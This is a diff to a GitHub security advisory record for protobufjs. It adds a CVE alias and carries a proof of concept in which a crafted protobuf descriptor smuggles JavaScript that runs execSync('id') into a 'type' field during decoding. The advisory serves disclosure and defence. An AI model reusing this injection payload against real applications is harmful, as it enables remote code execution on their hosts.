Publish GHSA-xq3m-2v4x-88gg

Author: advisory-database[bot]

advisories/github-reviewed/2026/04/GHSA-xq3m-2v4x-88gg/GHSA-xq3m-2v4x-88gg.json

@@ -1,9 +1,11 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-xq3m-2v4x-88gg",
-  "modified": "2026-04-16T22:34:57Z",
+  "modified": "2026-04-18T16:18:23Z",
   "published": "2026-04-16T22:34:57Z",
-  "aliases": [],
+  "aliases": [
+    "CVE-2026-41242"
+  ],
   "summary": "Arbitrary code execution in protobufjs",
   "details": "### Summary\nprotobufjs compiles protobuf definitions into JS functions. Attackers can manipulate these definitions to execute arbitrary JS code.\n\n### Details\nAttackers can inject arbitrary code in the \"type\" fields of protobuf definitions, which will then execute during object decoding using that definition.\n\n### PoC\n```js\nconst protobuf = require('protobufjs');\nmaliciousDescriptor = JSON.parse(`{\"nested\":{\"User\":{\"fields\":{\"id\":{\"type\":\"int32\",\"id\":1},\"data\":{\"type\":\"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\\\nfunction X\",\"id\":2}}},\"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\\\nfunction X\":{\"fields\":{\"content\":{\"type\":\"string\",\"id\":1}}}}}`)\nconst root = protobuf.Root.fromJSON(maliciousDescriptor);\nconst UserType = root.lookupType(\"User\");\nconst userBytes = Buffer.from([0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f]);\ntry {\n    const user = UserType.decode(userBytes);\n} catch (e) {}\n```\n\n### Impact\nRemote code execution when attackers can control the protobuf definition files.",
   "severity": [